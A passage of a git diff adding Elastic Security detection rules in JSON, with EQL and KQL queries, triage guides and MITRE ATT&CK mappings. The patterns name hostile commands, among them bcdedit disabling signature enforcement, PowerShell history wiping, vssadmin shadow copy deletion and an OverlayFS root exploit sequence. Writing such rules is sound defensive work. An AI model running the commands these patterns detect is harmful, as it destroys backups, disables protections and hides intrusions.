"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json new file mode 100644 index 00000000000..81b1cd34742 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_111.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Endpoint Security Parent Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json new file mode 100644 index 00000000000..8e9888ee6ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable/modify the code signing policy through system native utilities. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Built-in tools", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b43570de-a908-4f7f-8bdb-b2df6ffd8c80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "b43570de-a908-4f7f-8bdb-b2df6ffd8c80_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json new file mode 100644 index 00000000000..44ea633072d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_106.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Atom desktop text editor Init File. Adversaries may add malicious JavaScript code to the init.coffee file that will be executed upon the Atom application opening.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Atom Init Script Modification", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.path:/Users/*/.atom/init.coffee and not process.name:(Atom or xpcproxy) and not user.name:root\n", + "references": [ + "https://github.com/D00MFist/PersistentJXA/blob/master/AtomPersist.js", + "https://flight-manual.atom.io/hacking-atom/sections/the-init-file/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b4449455-f986-4b5a-82ed-e36b129331f7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "b4449455-f986-4b5a-82ed-e36b129331f7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json new file mode 100644 index 00000000000..25093989b9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_5.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via OverlayFS", + "query": "sequence by process.parent.entity_id, host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"unshare\" and process.args : (\"-r\", \"-rm\", \"m\") and process.args : \"*cap_setuid*\" and user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n user.id == \"0\"]\n", + "references": [ + "https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability", + "https://twitter.com/liadeliyahu/status/1684841527959273472" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json new file mode 100644 index 00000000000..ae15c5e9190 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_110.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Console History", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n", + "references": [ + "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b5877334-677f-4fb9-86d5-a9721274223b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json new file mode 100644 index 00000000000..553bbb958c4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_111.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Console History", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n", + "references": [ + "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b5877334-677f-4fb9-86d5-a9721274223b_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json new file mode 100644 index 00000000000..d86206e72fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via 